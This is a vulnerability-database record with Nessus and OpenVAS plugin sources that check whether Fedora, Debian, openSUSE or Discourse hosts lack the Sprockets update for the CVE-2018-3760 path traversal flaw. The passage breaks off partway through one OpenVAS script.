{"id": "FEDORA_2018-FD29597FA4.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Fedora 27 : rubygem-sprockets (2018-fd29597fa4)", "description": "Update to Sprockets 3.7.2. Fixes CVE-2018-3760:\nhttps://access.redhat.com/security/cve/cve-2018-3760\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2018-07-24T00:00:00", "modified": "2021-01-06T00:00:00", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/111251", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/cve-2018-3760", "https://bodhi.fedoraproject.org/updates/FEDORA-2018-fd29597fa4", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3760"], "cvelist": ["CVE-2018-3760"], "immutableFields": [], "lastseen": "2022-05-23T16:06:57", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-3760"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1419-1:7C53E", "DEBIAN:DSA-4242-1:A62DA", "DEBIAN:DSA-4242-1:C27C6"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-3760"]}, {"type": "fedora", "idList": ["FEDORA:2E73F65F395E", "FEDORA:714376469796"]}, {"type": "github", "idList": ["GHSA-PR3H-JJHJ-573X"]}, {"type": "hackerone", "idList": ["H1:307808"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4242.NASL", "FEDORA_2018-2735A12B72.NASL", "OPENSUSE-2018-686.NASL", "OPENSUSE-2018-773.NASL", "OPENSUSE-2019-542.NASL", "WEB_APPLICATION_SCANNING_112718"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108543", "OPENVAS:1361412562310704242", "OPENVAS:1361412562310851804", "OPENVAS:1361412562310852058", "OPENVAS:1361412562310874818", "OPENVAS:1361412562310874819", "OPENVAS:1361412562310891419"]}, {"type": "redhat", "idList": ["RHSA-2018:2244", "RHSA-2018:2245", "RHSA-2018:2561", "RHSA-2018:2745"]}, {"type": "seebug", "idList": ["SSV:97466"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:1854-1", "OPENSUSE-SU-2018:2124-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-3760"]}], "rev": 4}, "score": {"value": 5.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-3760"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1419-1:7C53E", "DEBIAN:DSA-4242-1:C27C6"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-3760"]}, {"type": "fedora", "idList": ["FEDORA:2E73F65F395E", "FEDORA:714376469796"]}, {"type": "github", "idList": ["GHSA-PR3H-JJHJ-573X"]}, {"type": "hackerone", "idList": ["H1:307808"]}, {"type": "nessus", "idList": ["OPENSUSE-2018-686.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704242", "OPENVAS:1361412562310851804", "OPENVAS:1361412562310874818", "OPENVAS:1361412562310874819"]}, {"type": "redhat", "idList": ["RHSA-2018:2245"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-3760"]}, {"type": "seebug", "idList": ["SSV:97466"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:1854-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-3760"]}]}, "exploitation": null, "vulnersScore": 5.8}, "_state": {"dependencies": 0}, "_internal": {}, "pluginID": "111251", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-fd29597fa4.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111251);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-3760\");\n script_xref(name:\"FEDORA\", value:\"2018-fd29597fa4\");\n\n script_name(english:\"Fedora 27 : rubygem-sprockets (2018-fd29597fa4)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Sprockets 3.7.2. Fixes CVE-2018-3760:\nhttps://access.redhat.com/security/cve/cve-2018-3760\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3760\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-fd29597fa4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-sprockets package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"rubygem-sprockets-3.7.2-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-sprockets\");\n}\n", "naslFamily": "Fedora Local Security Checks", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-sprockets", "cpe:/o:fedoraproject:fedora:27"], "solution": "Update the affected rubygem-sprockets package.", "nessusSeverity": "Medium", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.6"}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2018-07-14T00:00:00", "vulnerabilityPublicationDate": "2018-06-26T00:00:00", "exploitableWith": []}

{"ubuntucve": [{"lastseen": "2021-11-22T21:35:47", "description": "There is an information leak vulnerability in Sprockets. Versions Affected:\n4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower. Specially crafted\nrequests can be used to access files that exists on the filesystem that is\noutside an application's root directory, when the Sprockets server is used\nin production. All users running an affected release should either upgrade\nor use one of the work arounds immediately.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=901913>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-06-26T00:00:00", "type": "ubuntucve", "title": "CVE-2018-3760", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-06-26T00:00:00", "id": "UB:CVE-2018-3760", "href": "https://ubuntu.com/security/CVE-2018-3760", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:33:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-07-15T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-sprockets FEDORA-2018-2735a12b72", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874819", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874819", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_2735a12b72_rubygem-sprockets_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for rubygem-sprockets FEDORA-2018-2735a12b72\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874819\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-15 06:08:13 +0200 (Sun, 15 Jul 2018)\");\n script_cve_id(\"CVE-2018-3760\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-sprockets FEDORA-2018-2735a12b72\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-sprockets'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-sprockets on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-2735a12b72\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RERZUR7IR6MHMK4T4P4PMNH7VEOLEBYO\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-sprockets\", rpm:\"rubygem-sprockets~3.7.2~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-07-04T18:55:27", "description": "Orange Tsai discovered a path traversal flaw in ruby-sprockets, a\nRack-based asset packaging system. A remote attacker can take advantage\nof this flaw to read arbitrary files outside an application", "cvss3": {}, "published": "2018-07-09T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4242-1 (ruby-sprockets - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704242", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704242", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4242-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704242\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-3760\");\n script_name(\"Debian Security Advisory DSA 4242-1 (ruby-sprockets - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-07-09 00:00:00 +0200 (Mon, 09 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4242.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"ruby-sprockets on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 3.7.0-1+deb9u1.\n\nWe recommend that you upgrade your ruby-sprockets packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/ruby-sprockets\");\n script_tag(name:\"summary\", value:\"Orange Tsai discovered a path traversal flaw in ruby-sprockets, a\nRack-based asset packaging system. A remote attacker can take advantage\nof this flaw to read arbitrary files outside an application's root\ndirectory via specially crafted requests, when the Sprockets server is\nused in production.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-sprockets\", ver:\"3.7.0-1+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-31T17:33:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-26T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for rubygem-sprockets (openSUSE-SU-2018:2124-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852058", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852058", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852058\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-3760\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:40:17 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for rubygem-sprockets (openSUSE-SU-2018:2124-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:2124-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-07/msg00041.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-sprockets'\n package(s) announced via the openSUSE-SU-2018:2124-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for rubygem-sprockets fixes the following issues:\n\n The following security vulnerability was addressed:\n\n - CVE-2018-3760: Fixed a path traversal issue in\n sprockets/server.rb:forbidden_request?(), which allowed remote attackers\n to read arbitrary files (bsc#1098369)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-773=1\");\n\n script_tag(name:\"affected\", value:\"rubygem-sprockets on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.5-rubygem-sprockets\", rpm:\"ruby2.5-rubygem-sprockets~3.7.2~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"uby2.5-rubygem-sprockets-doc\", rpm:\"uby2.5-rubygem-sprockets-doc~3.7.2~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-08-29T14:54:53", "description": "Discourse is prone to a information leak vulnerability in the\n ", "cvss3": {}, "published": "2019-01-30T00:00:00", "type": "openvas", "title": "Discourse < 2.2.0.beta2 Information Leak Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2019-08-28T00:00:00", "id": "OPENVAS:1361412562310108543", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108543", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Discourse < 2.2.0.beta2 Information Leak Vulnerability\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:discourse:discourse\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108543\");\n script_version(\"2019-08-28T09:18:40+0000\");\n script_cve_id(\"CVE-2018-3760\");\n script_tag(name:\"last_modification\", value:\"2019-08-28 09:18:40 +0000 (Wed, 28 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-01-30 11:11:39 +0100 (Wed, 30 Jan 2019)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Discourse < 2.2.0.beta2 Information Leak Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_discourse_detect.nasl\");\n script_mandatory_keys(\"discourse/detected\");\n\n script_tag(name:\"summary\", value:\"Discourse is prone to a information leak vulnerability in the\n 'sprockets' 3rdparty component.\");\n\n script_tag(name:\"affected\", value:\"Discourse before version 2.2.0.beta2.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.2.0.beta2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://meta.discourse.org/t/discourse-2-1-0-beta-2-release-notes/90712\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nvers = infos[\"version\"];\n\nif (version_is_less(version: vers, test_version: \"2.2.0\") ||\n version_is_equal(version: vers, test_version: \"2.2.0.beta1\")) {\n report = report_fixed_ver(installed_version: vers, fixed_version: \"2.2.0.beta2\", install_path: infos[\"location\"]);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-04T16:41:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-30T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for rubygem-sprockets (openSUSE-SU-2018:1854-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2020-06-03T00:00:00", "id": "OPENVAS:1361412562310851804", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851804", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851804\");\n script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-30 05:51:01 +0200 (Sat, 30 Jun 2018)\");\n script_cve_id(\"CVE-2018-3760\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for rubygem-sprockets (openSUSE-SU-2018:1854-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-sprockets'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This update for rubygem-sprockets fixes the following issues:\n\n The following security vulnerability was addressed:\n\n - CVE-2018-3760: Fixed a directory traversal issue in\n sprockets/server.rb:forbidden_request?(), which allowed remote attackers\n to read arbitrary files via specially crafted requests. (boo#1098369)\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-686=1\");\n\n script_tag(name:\"affected\", value:\"rubygem-sprockets on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:1854-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-06/msg00052.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-rubygem-sprockets\", rpm:\"ruby2.1-rubygem-sprockets~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-rubygem-sprockets-doc\", rpm:\"ruby2.1-rubygem-sprockets-doc~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-rubygem-sprockets\", 